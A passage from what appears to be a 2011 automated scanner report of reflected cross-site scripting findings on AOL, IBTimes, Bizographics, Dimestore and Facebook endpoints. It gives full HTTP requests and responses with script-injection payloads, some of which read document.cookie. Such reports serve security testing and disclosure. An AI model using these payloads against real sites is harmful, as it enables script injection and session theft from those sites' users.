This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/engadgetbdddb'><script>alert(1)</script>9c1db18b1e0 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:20:05 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=bda159010a031f735b16f1ecc1bb52c2; expires=Tue, 01 Mar 2011 23:53:25 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 06 Feb 2011 20:20:05 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 23302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<img src='/sites/default/files/webfm/brand-logos/engadgetbdddb'><script>alert(1)</script>9c1db18b1e0.png' alt='engadgetbdddb'>
...[SNIP]...

1.28. http://advertising.aol.com/brands/engadget [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /brands/engadget

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d672"><script>alert(1)</script>3b70e9dcf4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/engadget?9d672"><script>alert(1)</script>3b70e9dcf4e=1 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:19:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=26ddbfcfb72d0cd13cdd4841bd55099a; expires=Tue, 01 Mar 2011 23:53:13 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 06 Feb 2011 20:19:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 30567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a name="aol-share" class="aol-share" href="mailto:yourfriend@email.com?subject=Check this out: AOL Advertising | Brands/Engadget&body=http://advertising.aol.com/brands/engadget?9d672"><script>alert(1)</script>3b70e9dcf4e=1" title="AOL Advertising | Brands/Engadget">
...[SNIP]...

1.29. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://africa.ibtimes.com
Path:   /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c3c"-alert(1)-"489c5415bae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?49c3c"-alert(1)-"489c5415bae=1 HTTP/1.1
Host: africa.ibtimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:19:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dc543bc55452b21506b39f10b8963776; expires=Sun, 06 Feb 2011 22:19:59 GMT; path=/
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-tran
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 56763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<script type="text/javascript">
var exURL = escape("http://www.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?49c3c"-alert(1)-"489c5415bae=1");
var exHed = encodeURIComponent("Google Grants $100 Mln Equity to Eric Schmidt");
var exDek = encodeURIComponent("Search giant Google said it will award $100 million worth of equity to Eri
...[SNIP]...

1.30. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://africa.ibtimes.com
Path:   /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce9ce"><script>alert(1)</script>4fa7211aef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?ce9ce"><script>alert(1)</script>4fa7211aef3=1 HTTP/1.1
Host: africa.ibtimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:19:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=b470a06fa0e8e476a5bf0dab6d10a9ed; expires=Sun, 06 Feb 2011 22:19:56 GMT; path=/
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-tran
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 56853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<input type="hidden" id="urlhome" value="http://www.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?ce9ce"><script>alert(1)</script>4fa7211aef3=1">
...[SNIP]...

1.31. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://africa.ibtimes.com
Path:   /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6330e'-alert(1)-'bdd8bdef0e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?6330e'-alert(1)-'bdd8bdef0e3=1 HTTP/1.1
Host: africa.ibtimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:20:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=8dc726c62f556b216ff22cbd19d8797c; expires=Sun, 06 Feb 2011 22:20:01 GMT; path=/
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-tran
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 56763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
cript type="text/javascript">
                                                                                       tweetmeme_url = 'http://www.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?6330e'-alert(1)-'bdd8bdef0e3=1';
                                                                                       tweetmeme_source = 'IBTIMES.COM';
                                                                               </script>
...[SNIP]...

1.32. http://aol.tt.omtrdc.net/m2/aol/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.tt.omtrdc.net
Path:   /m2/aol/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 7afda<script>alert(1)</script>150cf4dbb8a was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/aol/mbox/standard?mboxHost=travel.aol.com&mboxSession=1297021706926-216891&mboxPage=1297021706926-216891&screenHeight=1200&screenWidth=1920&browserWidth=1001&browserHeight=1031&browserTimeOffset=-360&colorDepth=16&mboxCount=1&dept=Main&subDept=Travel%20Main&pageName=Travel%20Main&mbox=AOL_Travel_Global7afda<script>alert(1)</script>150cf4dbb8a&mboxId=0&mboxTime=1297000108866&mboxURL=http%3A%2F%2Ftravel.aol.com%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: aol.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://travel.aol.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 213
Date: Sun, 06 Feb 2011 19:51:18 GMT
Server: Test & Target

mboxFactories.get('default').get('AOL_Travel_Global7afda<script>alert(1)</script>150cf4dbb8a',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1297021706926-216891.17");

1.33. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 5751e<script>alert(1)</script>0a7121bf666 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=r9t72482usanbp6sphprhvun5751e<script>alert(1)</script>0a7121bf666&callback=bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KcHQgjfsRES4aj5XcunNcMDa7Re6IGD4lD9isMW4yisjii3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRxzXHkaVY6akFDLPXLn6FqEVUJBxdqAyD5JvasruiiXn4DYsCJ0KjazaTSYX2qPr7QipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 06 Feb 2011 20:59:22 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun5751e<script>alert(1)</script>0a7121bf666)

1.34. http://api.bizographics.com/v1/profile.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a9d50<script>alert(1)</script>8356ded867a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=r9t72482usanbp6sphprhvun&callback=bizo_callbacka9d50<script>alert(1)</script>8356ded867a HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KcHQgjfsRES4aj5XcunNcMDa7Re6IGD4lD9isMW4yisjii3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRxzXHkaVY6akFDLPXLn6FqEVUJBxdqAyD5JvasruiiXn4DYsCJ0KjazaTSYX2qPr7QipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Sun, 06 Feb 2011 20:59:25 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KerMh8N4wnRRaj5XcunNcMDa7Re6IGD4lFp4YH8CH6lnAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtTclMip9ek9khgmm0D5jgFUisEVUJBxdqAyBeojO7uEzb2p0Yl2wVR6WyPhWWt9YcKJ0ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 203
Connection: keep-alive

bizo_callbacka9d50<script>alert(1)</script>8356ded867a({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

1.35. http://api.dimestore.com/viapi [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 8d0f9<a>df4d06c17ec was submitted in the name parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=cookie&value=EyADRWJEY0NpdVl%252BSWFG&name=IgUsFjsrORc3NyILDBo6HychGw%253D%253D8d0f9<a>df4d06c17ec&mode=set HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sun, 06 Feb 2011 20:25:04 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: IgUsFjsrORc3NyILDBo6HychGw%3D%3D8d0f9<a>df4d06c17ec=EyADRWJEY0NpdVl%2BSWFG; Expires=Mon, 06-Feb-2012 20:25:04 GMT
Content-Length: 186

<?xml version='1.0' encoding='iso-8859-1' ?>
<response><cookie><name>IgUsFjsrORc3NyILDBo6HychGw%3D%3D8d0f9<a>df4d06c17ec</name><value>EyADRWJEY0NpdVl%2BSWFG</value></cookie></response>

1.36. http://api.dimestore.com/viapi [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the name request parameter is copied into the XML document as plain text between tags. The payload 8e4e5<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>73605709c16 was submitted in the name parameter. This input was echoed as 8e4e5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>73605709c16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /viapi?action=cookie&name=IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkJ2c1E%253D8e4e5<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>73605709c16&mode=get HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sun, 06 Feb 2011 20:25:03 GMT
Content-Type: text/xml
Connection: keep-alive
Content-Length: 244

<?xml version='1.0' encoding='iso-8859-1' ?>
<response><cookie><name>IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkJ2c1E%3D8e4e5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>73605709c16</name>
...[SNIP]...

1.37. http://api.dimestore.com/viapi [value parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the value request parameter is copied into the XML document as plain text between tags. The payload a2b55<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>43cd31f02e9 was submitted in the value parameter. This input was echoed as a2b55<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>43cd31f02e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /viapi?action=cookie&value=EyADRWJEY0NpdVl%252BSWFGa2b55<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>43cd31f02e9&name=IgUsFjsrORc3NyILDBo6HychGw%253D%253D&mode=set HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sun, 06 Feb 2011 20:25:04 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: IgUsFjsrORc3NyILDBo6HychGw%3D%3D="EyADRWJEY0NpdVl%2BSWFGa2b55<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>43cd31f02e9"; Version=1; Max-Age=31536000
Content-Length: 256

<?xml version='1.0' encoding='iso-8859-1' ?>
<response><cookie><name>IgUsFjsrORc3NyILDBo6HychGw%3D%3D</name><value>EyADRWJEY0NpdVl%2BSWFGa2b55<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>43cd31f02e9</value>
...[SNIP]...

1.38. http://api.facebook.com/restserver.php [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload ee046<img%20src%3da%20onerror%3dalert(1)>f2ed30b6f31 was submitted in the method parameter. This input was echoed as ee046<img src=a onerror=alert(1)>f2ed30b6f31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?format=json&method=links.getStatsee046<img%20src%3da%20onerror%3dalert(1)>f2ed30b6f31&urls=http%253A%252F%252Fwww.electronista.com%252Farticles%252F11%252F02%252F04%252Fsales.of.glasses.free.3d.tvs.weaker.than.expected%252F%253Fe4c13%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Ec3b351ab889%253D1&callback=aptureJsonCallback0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsmallbusiness.aol.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fsmallbusiness.aol.com%252F%253F998a2%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9cd08062e59%253D1%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Sun, 06 Feb 2011 20:38:25 GMT
Content-Length: 481

aptureJsonCallback0({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"format","value":"json"},{"key":"method","value":"links.getStatsee046<img src=a onerror=alert(1)>f2ed30b6f31"},{"key":"urls","value":"http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C
...[SNIP]...

1.39. http://api.facebook.com/restserver.php [urls parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 9cac7<img%20src%3da%20onerror%3dalert(1)>428383ff7dc was submitted in the urls parameter. This input was echoed as 9cac7<img src=a onerror=alert(1)>428383ff7dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?format=json&method=links.getStats&urls=http%253A%252F%252Fwww.electronista.com%252Farticles%252F11%252F02%252F04%252Fsales.of.glasses.free.3d.tvs.weaker.than.expected%252F%253Fe4c13%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Ec3b351ab889%253D19cac7<img%20src%3da%20onerror%3dalert(1)>428383ff7dc&callback=aptureJsonCallback0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsmallbusiness.aol.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fsmallbusiness.aol.com%252F%253F998a2%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9cd08062e59%253D1%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 06 Feb 2011 12:40:37 -0800
Pragma:
X-Cnection: close
Date: Sun, 06 Feb 2011 20:38:37 GMT
Content-Length: 642

